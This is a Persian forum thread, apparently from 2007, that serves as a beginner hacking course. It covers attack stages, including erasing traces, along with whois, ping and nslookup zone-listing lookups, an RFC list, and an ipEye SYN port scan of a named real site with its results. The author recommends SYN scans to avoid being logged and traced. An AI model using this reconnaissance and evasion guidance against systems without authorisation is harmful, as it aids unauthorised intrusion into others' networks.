به‌ آنها اختصاص پيدا می‌کنه و زحماتتون هدر می‌ره (البته برای جلوگيری از اين امر هم روشهايی هست که در آينده ايشالله ميگم). حالا تقسيم‌بندی: ۱- حمله به روش Denial of Service Attack) DoS) ۲- حمله به روش Exploit ۳- حمله به روش Info Gathering (تلنت کردن يکی از مثالهای آن است که امروز آموختيد) ۴- حمله به روش Disinformation ترسيم مسير برای آينده: ۱- اولين و مهمترين تصميم انتخاب نوع کامپيوتری است که می‌خواهيد هک کنيد ( کلاينت يا سرور )، زيرا روش‌هک کردن اين‌دو بجز در مراحل ابتدايی کاملا متفاوت است. ۲- دومين گام انتخاب يک کامپيوتر مشخص (مثلا کامپيوتری که فلان سايت را نگه می‌دارد که مثالی برای کامپيوتر سرور است و يا کامپیوتر فلان شخصی که با او چت می‌کنيد که مثالی برای کامپيوتر کلاينت است) و جمع‌آوری اطلاعات در مورد آن است. اين جمع‌آوری اطلاعات از قربانی (Victim) را Footprinting گويند. اولين مشخصه‌ای که بايد کشف شود، ip اوست. يکی ديگر از اطلاعات مهم که معمولا دنبالش هستيم، پيدا کردن نوع سيستم‌عامل و نيز برنامه‌هايی است که کامپيوتر شخص از آنها بهره می‌برد. يکی از مهمترين ( و گاه خطرناک‌ترين) کارها، تست‌کردن پورت‌های آن کامپيوتر برای ديدن اينکه کدام پورت‌ها باز و کدام‌ها بسته هستند. ۳- مرحله بعدی در واقع شروع تلاش برای نفوذ به سيستم است. اين نفوذ سطوح مختلف دارد و بالاترين آن که در کامپيوترهای سرور روی می‌دهد، حالتی است که بتوان username و password مربوط به مدير کامپيوتر (administrator) يا superuser را به‌دست آورده و از طريق اين Shell Account به نهايت نفوذ دست‌ يابيم ولی گاه به‌دلايل مختلف (مربوط به سطح علمی خود و ... ) نمی‌توان به اين سطح دست‌يافت اما به هر حال برای مرحله بعدی می‌تواند استفاده شود. اين مرحله جايی است که هنر شما يه عنوان يک هکر آغاز شده و نيز به پايان می‌رسد. ۴- اين مرحله بعد از نفوذ روی می‌دهد که در آن به يک سطحی از کنترل سيستم رسيده‌ايد. رفتار شما در اين مرحله مشخص می‌کند که چه نوع هکر هستيد(سامورايی، واکر و يا کراکر) و اينکه آيا جنبه ياد گرفتن را داشته‌ايد يا نه، همينجا مشخص خواهد شد. ۵- مرحله آخر پاک کردن ردپاست تا گير نيفتيم (البته بعضی وقتها برای کلاس گذاشتن بايد گير بيفتيم، هه هه ...). بعضی از سيستم‌ها آمار login را نگه می‌دارند که در مورد آنها اين مرحله بسيار مهم است. خلاصه مطالب بالا به اين صورت است: Selection -> FootPrinting -> Penetration -> [Changings] -> Cleaning شروع مبحث Footprinting گفتيم که اولين مرحله جمع‌آوری اطلاعات است که به آن FootPrinting می‌گويند. اين مبحث را با آموزش روش پيدا کردن ip شروع می‌کنيم. پيدا کردن ip يک سايت با دانستن آدرس اينترنتی برای اين کار روشهای مختلفی هست: ۱- در (Internet Explorer (IE آدرس را تايپ کنيد و Enter را فشار دهيد. در قسمت پايين مرورگر يعنی Status Bar پس از چند لحظه برای مدت کوتاهی ip نمايش داده می‌شود و می‌توانيد آنرا يادداشت کنيد. اگر طول اين مدت بسيار کوتاه است می‌توانيد از صفحه عکس بگيريد ( با دکمه Print Screen ) و در يک نرم‌افزار گرافيکی بعد از باز کردن يک صفحه خالی به کمک Ctrl+V آنرا مشاهده کنيد. [ عجب راه احمقانه‌ای ;-) اگر اين کار را برای [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] انجام دهيم: که همان شماره ip برای [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] است. نکته بسيار مهم اين است که به‌دليل ضريب اشتباه بسيار بالای آن هيچ‌گاه از اين روش استفاده نکنيد. نتايج ممکن است کاملا اشتباه باشد که بعدا ميگم چرا. ۲- دستور ping را در command prompt صادر کنيد: ping domain در اين حالت می‌توانم ip آن سايت را ملاحظه کنم. (البته کار اصلی ping يک چيز ديگست و ميشه گفت داريم ازش سوءاستفاده می‌کنيم). مثلا برای پيدا کردن ip سازين می‌نويسم: ping sazin.com و جواب می‌شنوم: Pinging sazin.com [63.148.227.65] with 32 bytes of data: Reply from 63.148.227.65: bytes=32 time=821ms TTL=111 Reply from 63.148.227.65: bytes=32 time=821ms TTL=111 Reply from 63.148.227.65: bytes=32 time=822ms TTL=111 Reply from 63.148.227.65: bytes=32 time=811ms TTL=111 Ping statistics for 63.148.227.65: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 811ms, Maximum = 822ms, Average = 818ms ملاحظه می‌فرماييد که ip سازين 63.148.227.65 است. اگر دستور ping را به‌جای sazin.com برای [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] صادر کنيد، جواب همان است. البته برای سايت‌های بزرگ جواب‌های حاصل متفاوت خواهد بود. ۳- روش بعدی و کامل‌ترين روش whois کردن به بعضی سايت‌های خاص است. بعدا اين را کامل‌تر توضيح می‌دم ولی فعلا روشش رو می‌گم. آدرس زير را در مرورگر خود تايپ کنيد: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] که به‌جای xxxxxx آدرس مورد نظر را تايپ کنيد. مثلا برای sazin.com يکی از دو آدرس زير را بايد تايپ کرد: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] چيزی که در صفحه ظاهر می‌شود به صورت زير است: whois -h magic 63.148.227.65 sazin.com resolves to 63.148.227.65 Trying whois -h whois.arin.net 63.148.227.65 Qwest Communications NET-QWEST-BLKS-2 (NET-63-144-0-0-1) 63.144.0.0 - 63.151.255.255 Neutron Digital Media Corp. QWST-63-148-224 (NET-63-148-224-0-1) 63.148.224.0 - 63.148.231.255 # ARIN Whois database, last updated 2002-09-04 19:05 # Enter ? for additional hints on searching ARIN"s Whois database. که آدرس ip در سطر اول و دوم ذکر شده است. اگر دو روش آخر را برای سايت بزرگ yahoo انجام دهيم، نتايج زير را می‌بينيم: --> روش ping : [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ====> 64.58.76.229 yahoo.com ====> 66.218.71.198 --> روش whois : ...و [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ====> 66.218.71.86 64.58.79.230 و yahoo.com ====> 66.218.71.198 نتايج حاصل گويای آن است که چرا بهتر است از whois استفاده کنيم. RFC چيست ؟ متون بسيار کامل ولی خشک و ثقيل که در مورد مفاهيم مختلف شبکه بحث می‌کنند. اين فايل‌ها به صورت متنی و با پسوند txt هستند و به‌عنوان مرجع (برای مراجعه و نه مطالعه کامل) کاربرد دارند. اين فايل‌ها يک‌بار منتشر شده و هرگز تغيير داده نمی‌شوند (حتی اگر حاوی اشتباه باشند.) فايل‌های RFC از کجا قابل دسترسی هستند؟ RFCها از سايت‌های بسياري قابل دسترس هستند ولی سايت مورد علاقه من برای RFCها، سايت زير است: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] که به‌جای xxxxxxx نام rfc موردنظر را می‌نویسيم. مثلا برای دسترسی به rfc791 بايد آدرس را به‌ صورت زير تايپ کنيم: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

mazi_z_PSP
08-05-2007, 11:52
ليست مشهورترين RFCها: +General Information RFC1360 IAB Official Protocol Standards RFC1340 Assigned Numbers RFC1208 Glossary of Networking Terms RFC1180 TCP/IP Tutorial RFC1178 Choosing a Name for Your Computer RFC1175 FYI on Where to Start: A Bibliography of Inter-networking Information RFC1173 Responsibilities of Host and Network Managers: A Summary of the Oral Tradition of the Internet RFC1166 Internet Numbers RFC1127 Perspective on the Host Requirements RFCs RFC1123 Requirements for Internet Hosts—Application and Support RFC1122 Requirements for Internet Hosts—Communication Layers RFC1118 Hitchhikers Guide to the Internet RFC1011 Official Internet Protocol RFC1009 Requirements for Internet Gateways RFC980 Protocol Document Order Information +TCP and UDP RFC1072 TCP Extensions for Long-Delay Paths RFC896 Congestion Control in IP/TCP Internetworks RFC879 TCP Maximum Segment Size and Related Topics RFC813 Window and Acknowledgment Strategy in TCP RFC793 Transmission Control Protocol RFC768 User Datagram Protocol +IP and ICMP RFC1219 On the Assignment of Subnet Numbers RFC1112 Host Extensions for IP Multicasting RFC1088 Standard for the Transmission of IP Datagrams over NetBIOS Networks RFC950 Internet Standard Subnetting Procedure RFC932 Subnetwork Addressing Schema RFC922 Broadcasting Internet Datagrams in the Presence of Subnets RFC9l9 Broadcasting Internet Datagrams RFC886 Proposed Standard for Message Header Munging RFC815 IP Datagram Reassembly Algorithms RFC814 Names, Addresses, Ports, and Routes RFC792 Internet Control Message Protocol RFC791 Internet Protocol RFC781 Specification of the Internet Protocol (IP) Timestamp Option +Lower Layers RFC1236 IP to X.121 Address Mapping for DDN RFC1220 Point-to-Point Protocol Extensions for Bridging RFC1209 Transmission of IP Datagrams over the SMDS Service RFC1201 Transmitting IP Traffic over ARCNET Networks RFC1188 Proposed Standard for the Transmission of IP Datagrams over FDDI Networks RFC1172 Point-to-Point Protocol Initial Configuration Options RFC1171 Point-to-Point Protocol for the Transmission of Multiprotocol Datagrams over Point-to-Point Links RFC1149 Standard for the Transmission of IP Datagrams on Avian Carriers RFC1055 Nonstandard for Transmission of IP Datagrams over Serial Lines: SLIP RFC1044 Internet Protocol on Network Systems HYPERchannel: Protocol Specification RFC1042 Standard for the Transmission of IP Datagrams over IEEE 802 Networks RFC1027 Using ARP to Implement Transparent Subnet Gateways RFC903 Reverse Address Resolution Protocol RFC895 Standard for the Transmission of IP Datagrams over Experimental Ethernet Networks RFC894 Standard for the Transmission of IP Datagrams over Ethernet Networks RFC893 Trailer Encapsulations RFC877 Standard for the Transmission of IP Datagrams over Public Data Networks +Bootstrapping RFC1084 BOOTP Vendor Information Extensions RFC951 Bootstrap Protocol RFC906 Bootstrap Loading Using TFTP +Domain Name System RFC1101 DNS Encoding of Network Names and Other Types RFC1035 Domain Names—Implementation and Specification RFC1034 Domain Names—Concepts and Facilities RFC1033 Domain Administrators Operations Guide RFC1032 Domain Administrators Guide RFC974 Mail Routing and the Domain System RFC920 Domain Requirements RFC799 Internet Name Domains +File Transfer and File Access RFC1094 NFS: Network File System Protocol Specification RFC1068 Background File Transfer Program (BFTP) RFC959 File Transfer Protocol RFC949 FTP Unique-Named Store Command RFC783 TFTP Protocol (Revision 2) RFC775 Directory Oriented FTP Commands +Mail RFC1341 MIME (Multipurpose Internet Mail Extensions) Mechanisms for Specifying and Describing the Format of Internet Message Bodies RFC1143 Q Method of Implementing Telnet Option Negotiation RFC1090 SMTP on X.25 RFC1056 PCMAIL: A Distributed Mail System for Personal Computers RFC974 Mail Routing and the Domain System RFC822 Standard for the Format of ARPA Internet Text Messages RFC821 Simple Mail Transfer Protocol +Routing Protocols RFC1267 A Border Gateway Protocol 3 (BGP-3) RFC1247 OSPF version 2 RFC1222 Advancing the NSFNET Routing Architecture RFC1195 Use of OSI IS-IS for Routing in TCP/IP and Dual Environments RFC1164 Application of the Border Gateway Protocol in the Internet RFC1163 Border Gateway Protocol (BGP) RFC1136 Administrative Domains and Routing Domains: A Model for Routing in the Internet RFC1074 NSFNET Backbone SPF-Based Interior Gateway Protocol RFC1058 Routing Information Protocol RFC911 EGP ateway under Berkeley UNIX 4.2 RFC904 Exterior Gateway Protocol Formal Specification RFC888 STUB Exterior Gateway Protocol RFC827 Exterior Gateway Protocol (EGP) RFC823 DARPA Internet Gateway +Routing Performance and Policy RFC1254 Gateway Congestion Control Survey RFC1246 Experience with the OSPF Protocol RFC1245 OSPF Protocol Analysis RFC1125 Policy Requirements for Inter-Administrative Domain Routing RFC1124 Policy Issues in Interconnecting Networks RFC1104 Models of Policy-Based Routing RFC1102 Policy Routing in Internet Protocols +Terminal Access RFC1205 Telnet 5250 Interface RFC1198 FYI on the X Window System RFC1184 Telnet Linemode Option RFC1091 Telnet Terminal-Type Option RFC1080 Telnet Remote Flow Control Option RFC1079 Telnet Terminal Speed Option RFC1073 Telnet Window Size Option RFC1053 Telnet X.3 PAD Option RFC1043 Telnet Data Entry Terminal Option: DODIIS Implementation RFC1041 Telnet 3270 Regime Option RFC1013 X Window System Protocol, version 11: Alpha Update RFC946 Telnet Terminal Location Number Option RFC933 Output Marking Telnet Option RFC885 Telnet End of Record Option RFC861 Telnet Extended Options: List Option RFC860 Telnet Timing Mark Option RFC859 Telnet Status Option RFC858 Telnet Suppress Go Ahead Option RFC857 Telnet Echo Option RFC856 Telnet Binary Transmission RFC855 Telnet Option Specifications RFC854 Telnet Protocol Specification RFC779 Telnet Send-Location Option RFC749 Telnet SUPDUP-Output Option RFC736 Telnet SUPDUP Option RFC732 Telnet Data Entry Terminal Option RFC727 Telnet Logout Option RFC726 Remote Controlled Transmission and Echoing Telnet Option RFC698 Telnet Extended ASCII Option +Other Applications RFC1196 Finger User Information Protocol RFC1179 Line Printer Daemon Protocol RFC1129 Internet Time Synchronization: The Network Time Protocol RFC1119 Network Time Protocol (version 2) Specification and Implementation RFC1057 RPC: Remote Procedure Call Protocol Specification: Version 2 RFC1014 XDR: External Data Representation Standard RFC954 NICNAME/WHOIS RFC868 Time Protocol RFC867 Daytime Protocol RFC866 Active Users RFC865 Quote of the Day Protocol, RFC864 Character Generator Protocol RFC863 Discard Protocol RFC862 Echo Protocol Network Management RFC1271 Remote Network Monitoring Management Information Base RFC1253 OSPE version 2: Management Information Base RFC1243 Appletalk Management Information Base RFC1239 Reassignment of Experimental MIBs to Standard MIBs RFC1238 CLNS MIB for Use with Connectionless Network Protocol (ISO 8473) and End System to Intermediate System (ISO 9542) RFC1233 Definitions of Managed Objects for the DS3 Interface Type RFC1232 Definitions of Managed Objects for the DS1 Interface Type RFC1231 IEEE 802.5 Token Ring MIB RFC1230 IEEE 802.4 Token Bus MIB RFC1229 Extensions to the Generic-Interface MIB RFC1228 SNMP-DPI: Simple Network Management Protocol Distributed Program Interface RFC1227 SNMP MUX protocol and MIB RFC1224 Techniques for Managing Asynchronously Generated Alerts RFC1215 Convention for Defining Traps for Use with the SNMP RFC1214 OSI Internet Management: Management Information Base RFC1213 Management Information Base for Network Management of TCP/IP-based Internets: MiB-II RFC1212 Concise MIB Definitions RFC1187 Bulk Table Retrieval with the SNMP RFC1157 Simple Network Management Protocol (SNMP) RFC1156 Management Information Base for Network Management of TCP/IP-based Internets RFC1155 Structure and Identification of Management Information for TCP/IP-Based Internets RFC1147 FYI on a Network Management Tool Catalog: Tools for Monitoring and Debugging TCP/IP Internets and Interconnected Devices RFC1089 SNMP over Ethernet +Tunneling RFC1241 Scheme for an Internet Encapsulation Protocol: Version 1 RFC1234 Tunneling IPX Traffic through IP Networks RFC1088 Standard for the Transmission of IP Datagrams over NetBIOS Networks RFC1002 Protocol Standard for a NetBIOS Service on a TCP/UDP Transport: Detailed Specifications RFC1001 Protocol Standard for a NetBIOS Service on a TCP/UDP Transport: Concepts and Methods +OSI RFC1240 OSI Connectionless Transport Services on Top of UDP: Version 1 RFC1237 Guidelines for OSI NSAP Allocation in the Internet RFC1169 Explaining the Role of GOSIP +Security RFC1244 Site Security Handbook RFC1115 Privacy Enhancement for Internet Electronic Mail: Part III Algorithms, Modes, and Identifiers [Draft] RFC1114 Privacy Enhancement for Internet Electronic Mail: Part II Certificate-Based Key Management [Draft] RFC1113 Privacy Enhancement for Internet Electronic Mail: Part I— Message Encipherment and Authentication Procedures [Draft] RFC1108 Security Options for the Internet Protocol +Miscellaneous RFC1251 Whos Who in the Internet: Biographies of IAB, IESG, and IRSG Members RFC1207 FYI on Questions and Answers: Answers to Commonly Asked Experienced Internet User RFC1206 FYI on Questions and Answers: Answers to Commonly Asked New Internet User Questions

mazi_z_PSP
08-05-2007, 11:54
چگونگی استفاده از nslookup وقتی که DNS Server يک سايت را به‌دست آورده باشيم (از طريق whois )، به کمک دستور nslookup مي‌توان اطلاعاتی اضافی در مورد آن سايت پيدا کرد. طريقه استفاده اين دستور به صورت زير است: فرض کنيد که من می‌خواهم از Domain Server سايت خودم (far30.com) اطلاعاتی به‌دست بيارم. اگر به اين سايت whois کنم، می‌بينم که دوتا Name Server يا DNS Server دارد: s1.prdev.com s2.prdev.com حالا ديگر آدرس DNS Server مربوط به far30.com را دارم و می‌توانم شروع کنم: ۱- دستور nslookup را در command prompt نوشته و اجرا می‌کنم: C:\>nslookup و نتايج را می‌بينم: *** Cant find server name for address 192.168.20.3: Non-exi... *** Cant find server name for address 192.168.20.1: Non-exi... *** Default servers are not available Default Server: UnKnown Address: 192.168.20.3 > علامت > يعنی شما می‌توانيد دستورات را تايپ کنيد. ۲- در جلوی علامت < دستور زير را تايپ می‌کنيم: > server dns_server که به جای dns_server بايد آدرس DNS Server سايت موردنظر را بنويسم. پس برای سايت far30.com می‌شود: > server s1.prdev.com و جواب می‌شنوم: Default Server: s1.prdev.com Address: 63.148.227.63 اگر در اين مرحله پيغام خطا می‌گيريد، بايد دوباره اين دستور را تايپ کنيد و نيز می‌توانيد از DNS Server دومی که در whois برای far30.com به‌دست آورديم ، استفاده کنيم. ۳- دستور زير را تايپ کنيد: > set type=any ۴- حالا به کمک دستور زير اطلاعات را به‌دست می‌آوريم: > ls -d site_name . که برای far30.com می‌شود: >ls -d far30.com. دقت کنيد که بعد از اسم سايت يک نقطه (dot) گذاشته‌ام، شما هم بهتر است اينطوری بنويسيد. نتايج زير حاصل می‌شود: [s1.prdev.com] far30.com. SOA s1.prdev.com admin.prdev.com. (2002070412 3600 600 86400 3600) far30.com. A 63.148.227.65 far30.com. NS s1.prdev.com far30.com. NS s2.prdev.com far30.com. MX 10 mail.far30.com far30.com. MX 15 far30.com ftp CNAME far30.com mail A 63.148.227.65 www CNAME far30.com far30.com. SOA s1.prdev.com admin.prdev.com. (2002070412 3600 600 86400 3600) > بعدا در مورد کاربرد تک‌تک اينها صحبت خواهم کرد ولی بعضی از آنها همين‌طوری هم اطلاعات واضحی دارند. ۵- دستور exit را مقابل < تايپ کرده و از nslookup خارج می‌شويم. شما برای تمرين همين کار را در مورد سايت neda.net.ir انجام دهيد. تقسيم‌بندی پورت‌ها از روی شماره آنها ۱- پورت‌های 0 تا 1023 : مشهورترين پورت‌ها هستند و معمولا هرکدام برای يک سرويس خاص استفاده می‌شود. با تعدادی از اين پورت‌ها در جلسات قبل آشنا شده‌ايد. ۲- پورت‌های 1024 تا 49151 : اين سری از پورت‌ها مشخصا با هيچ‌يک از سرويس‌های اينترنتی مرتبط نيستند بلکه وقتی که با يک ابزار شبکه مانند مرورگر اينترنت(مثل Internet Explore يا Netscape Navigator )، نرم‌افزار ارسال و دريافت E-mail (مثل Outlook يا Edura )، نرم‌افزارهای FTP (مثل WS-FTP يا Cute-FTP ) کار می‌کنيد، يکی از اين پورت‌ها به صورت random باز شده و يک ارتباط با سرور (با توجه به‌نوع سرويس اينترنتی که می‌دهد که يکی از پورت‌های 0 تا 1023 است) برقرار شده و داده‌ها ارسال و دريافت می‌شوند. يعنی پورت شما يکی از پورت‌های اين قسمت است و پورت سرور يکی از پورت‌های بالايی.اين سری پورت‌ها را پورت‌های register شده هم می‌گويند. ۳- پورت‌های 49152 تا 65535 : اين سری از پورت‌ها به‌ندرت استفاده می‌شوند. کاربرد اساسی آنها برای يک سری سرويس‌های خاص اينترنتی است و يا توسط trojanها (که برای ---- کردن کامپيوتر است) است. البته خيلی از trojanهای معروف از پورت‌های رديف ۲ هم استفاده می‌کنند و اين تقسيم‌بندی‌ها هميشه برقرار نيست و به‌همين علت است که گاهی پورت‌ها را به دو‌دسته زير 1024 و بالای 1024 تقسيم‌ می‌کنند. TCP و UDP چيست؟ مدل TCP/IP که برای ارتباط اينترنتی به‌کار می‌رود، می‌توان به لايه‌های مختلفی تقسيم‌بندی کرد که بعدا بيشتر توضيح می‌دم، اما يکی از اين لايه‌ها، لايه ارتباط host2host است که خود شامل دو پروتکل است به نامهای TCP و UDP : ۱- (TCP (Transmission Control Protocol : اين پروتکل قوی‌تر و قابل اعتمادتر است و اصولا پروتکل مهمتری نسبت به UDP محسوب می‌شود. اين پروتکل توانايی بازبينی بسته‌هاو کنترل خطا را هم دارد. ۲- (UDP (User Datagram Protocol : اين پروتکل برای کاهش overflow طراحی شده است و در خيلی از موارد وابسته به TCP است. نکته مهم اين است که وقتی با يک پورت خاص روی يک کامپيوتر ديگر ارتباط برقرار می‌کنيم، اين ارتباط می‌تواند از نوع TCP يا UDP باشد. بنابراين وقتی می‌خواهيم يک کامپيوتر خاصی را از نظر پورت‌ها بررسی کنيم، هردو بايد بررسی شود. معمول‌ترين Scanning ها کدامند؟ دو نوع معمول Scanning وجود دارد: ۱- IP Scanning : فرض کنيد که شما يک سری IP مربوط به يک ISP خاص را داريد و می‌خواهيد بدانيد که در اين لحظه کدام‌ها فعال (up) هستند تا فقط آنها را بررسی کنيد و نه‌ همه را. اين موضوع را بعدا توضيح می‌دم ( اين کار معمولا موقعی پيش می‌آيد که قرار است کلاينت هک کنيد و مهم نيست چه کسی باشد ) ۲- Port Scanning : در اين حالت ما IP يا IPهای مورد نظر را انتخاب کرده‌ايم و حالا می‌خواهيم بدانيم که کدام پورت‌ها روی آن کامپيوترها باز است. اين کار به کمک نرم‌افزارهای خاصی انجام می‌شود که مبحث امروز ماست. چگونه يک ارتباط TCP برقرار می‌شود که بگوييم فلان پورت باز است يا نه؟ برای اينکه تعيين کنيم که يک پورت روی يک سرور باز است يا نه، معمولا بايد يک TCP connect scan انجام دهيم. اول اين را بگم که Port Scanning انواع مختلف دارد که فعلا ما نوع TCP connect را مدنظر داريم. اين نوع اسکن سه مرحله دارد که به آن TCPs 3-way handshakeمی‌گويند: ۱- اول کامپيوتر ما به سمت سرور يک SYN packet می‌فرستد که به معنی درخواست اتصال است. ۲- اگر سرور اين درخواست را قبول کند، در مرحله دوم سرور به سمت ما يک SYN/ACK packet می‌فرستد. ۳- در مرحله آخر کامپيوتر ما يک ACK packet به سمت سرور می‌فرستد. نوع ديگری از پورت اسکن TCP SYN scan نام دارد. با توجه به اينکه معمولا اگر پورت اسکن به روش بالا (TCP connect scan) انجام دهيم، معمولا در سرور اين اتصال ذخيره خواهد شد و بعدا می‌تواند ما را رديابی کنند، به جای آن می‌توان از TCP SYN scan استفاده کرد. در اين نوع اسکن، مراحل ۱ و ۲ از بالا انجام می‌شود ولی مرحله ۳ نه! اگر در مرحله ۲ به ما يک SYN/ACK برسد، آن پورت باز است و اگر يک RST/ACK برسد، يعنی بسته است. انواع ديگری از پورت اسکنينگ هم وجود دارد مثل UDP scan, TCP Window scan, TCP ACK scan, TCP Null, TCP Xmas Tree, TCP FIN Scan چگونه می‌توان عمل Port scanning را انجام داد؟ در تمام مطالبی که تا اين مرحله گفته‌ام سعی کرده‌ام که فقط از ابزارهای موجود در ويندوز استفاده کنم و هيچ ابزار ديگری به‌کار نبرم، اما در مبحث پورت اسکنينگ چون هيچ ابزاری در ويندوز برای اين‌ کار نيست، به‌ناچار بايد يک سری برنامه را از اينترنت داون‌لود کنيد. (توجه داشته باشيد که فعلا حرفی از لينوکس نزده‌ام و سعی می‌کنم فعلا هيچ بحثی را در مورد آن مطرح نکنم) برای Port Scanning می‌توان از ابزارهای مختلفی استفاده کرد که اکثرا برای لينوکس طراحی شده‌اند، اما مهم‌ترين پورت اسکنرها برای ويندوز عبارتند از: ۱- نرم‌افزار NMapWin v1.3.0 : نسخه گرافيکی و مخصوص ويندوز برای nmap است (nmap در لينوکس استفاده می‌شود). nmap از کامل‌ترين ابزارهايی است که هکر‌ها استفاده می‌کنند که علاوه بر توانايی انواع پورت اسکنينگ‌ها، می‌تواند کارهای بسياری چون تشخيص سيستم‌عامل سرور و ... را انجام دهد. اين ابزار را بعدا توضيح خواهم داد ولی فعلا برای کار ما بيش‌ از حد کامله ;-) ۲- NetScanTools Pro 2000 : اين هم از بهترين‌هاست ولی چون پولی است به‌ جای داون‌لود بايد در CD هايی که در بازار هست پيدايش کنيد. ۳- WinScan : برای اسکن کردن TCP (ونه UDP) می‌توانيد از آن استفاده کنيد. من زياد ازش خوشم نيومد. ۴- ipEye v1.2 : من در این درس از اين نرم‌افزار استفاده خواهم کرد، برای داون‌لود آن می‌توانيد به سايت [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] مراجعه کنيد يا مستقيما با کليک روی اين لينک آن را داون‌لود کنيد. لازم است بگويم که اين نرم‌افزار فقط در ويندوز ۲۰۰۰ و xp کار می‌کند و نيز در يک بار اجرا فقط يک ip را می‌تواند تست کند. ضمنا فقط TCP را تست می‌کند. چگونه از ipEye برای پورت اسکنينگ استفاده کنيم؟ با تايپ ipEye در command prompt اين نتايج ظاهر می‌شود: ipEye 1.2 - (c) 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu) - [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] Error: Too few parameters. Usage: ipEye -p [optional parameters] ipEye -p [optional parameters] is one of the following: -syn = SYN scan -fin = FIN scan -null = Null scan -xmas = Xmas scan>br> (note: FIN, Null and Xmas scans dont work against Windows systems. [optional parameters] are selected from the following: -sip = source IP for the scan -sp = source port for the scan -d = delay between scanned ports in milliseconds (default set to 750 ms) فرض کنيد که می‌خواهيم سايت سازين را از نظر پورت‌ها از پورت ۱ تا ۲۰۰ تست کنيم. اول بايد ip آن را به دست بياوريم که می‌شود، 63.148.227.65 و حالا به کمک دستور زير آن را بررسی می‌کنيم: ipeye 63.148.227.65 -syn -p 1 200 دقت کنيد که 63.148.227.65 عدد ip سازين، syn- يعنی SYN SCAN و p 1 200- يعنی تست از پورت ۱ تا ۲۰۰ باشد. البته پارامترهای ديگری را هم می‌شود ست کرد که فعلا به درد ما نمی‌خورد. با اجرای اين دستور به نتايج زير می‌رسيم: ipEye 1.2 - (c) 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu) - [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] 1-20 [drop] 21 [open] 22 [closed or reject] 23-24 [drop] 25 [open] 26-52 [drop] 53 [open] 54-79 [drop] 80 [open] 81-109 [drop] 110 [open] 111-142 [drop] 143 [open] 144-200 [drop] 201-65535 [not scanned] Closed يعنی کامپيوتر در آن طرف هست ولی به پورت گوش نمی‌دهد، Reject يعنی اينکه يک firewall هست که اجازه اتصال به آن پورت را نمی‌دهد، Drop يعنی اينکه يک firewall همه‌چيز را پس‌ می‌زند و يا اصلا کامپيوتری اونور نيست، Open هم که يعنی باز. در مورد سازين می‌بينيد که از بين پورت‌های ۱ تا ۲۰۰ ، پورت‌های ۲۱، ۲۵، ۵۳، ۸۰، ۱۱۰، ۱۴۳ باز است و می‌توان به‌ آنها telnet کرد. دقت کنيد که تا تمام پورت‌هايی که مشخص شده، تست نشده است، هيچ نتيجه‌ای نشان داده نمی‌شود و يه‌کم صبر می‌خواد. ادامه بحث whois قبلا در مورد ip whois و dns whois صحبت کردم. بحث dns whois (کسب اطلاعات در مورد يک domain خاص) رو ادامه می‌دم. در درس قبلی از سايت SamSpade استفاده کردم. اگر اين whois رو تست کرده باشيد، می‌دانيد که برای يک سری از domain (دامنه) ها، جواب نمی‌دهد. مثال آن سايت‌هايی است که دارای دامنه جغرافيايی مثلا ايران هستند، در مورد دامنه‌های جغرافيايی ايران بايد گفت که به ir. ختم می‌شوند ( مثلا: neda.net.ir ). مثال ديگری که در whois سايت SamSpade کار نمی‌کند، تعدادی از دامنه‌های org , .net , .com. هستند که در internic.net ثبت نشده‌اند، بلکه در domainpeople.com ثبت شده‌اند ( مثلا sanjesh.org ). چند سال پيش ثبت domain هايی که در گروه org, net, com بودند، مختص به internic.net بود ولی الان ديگر اينطور نيست. کاری که شما بايد برای whois کردن بايد انجام دهيد، توجه به نوع آن domain است که از نوع com است يا ir است يا biz است و ... بعد از آن از يکی از سايت‌های زير استفاده کنيد : ۱- internic.net : برای edu , org , net , com عالی است. برای museum , int , info , coop , biz , arpa, aero هم‌ می‌تواند استفاده شود. صفحه وب مربوطه عبارت‌ است از [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] يا می‌توانيد مستقيما در مرورگر بنويسيد: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] که به‌جای xxxxxxxx مثلا بايد بنويسيد: far30.com ۲- nic.ir : برای ir استفاده می‌شود. صفحه وب مربوطه عبارت‌ است از /[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ۳- [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] : برای cc , info , biz , tv عالی است. صفحه وب مربوطه عبارت‌ است از /[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] يا می‌توانيد مستقيما در مرورگر بنويسيد: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] که اگر بخواهم مثلا ----.tv را whois کنم به‌جای yyyyy بايد بنويسيد ---- و به جای zzzz بايد بنويسيد tv ۴- domainpeople.com : برای name , biz , info , org , net , com عالی است. صفحه وب مربوطه عبارت‌ است از /[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] همانطور که ملاحظه می‌فرماييد، org , net , com در ۱ و ۴ مشترک است. علت آن است که بعضی‌ها در اولی و بعضی‌ها در چهارمی ثبت می‌شوند ولی برای whois کردن فرقی نمی‌کنه که شما از اولی استفاده 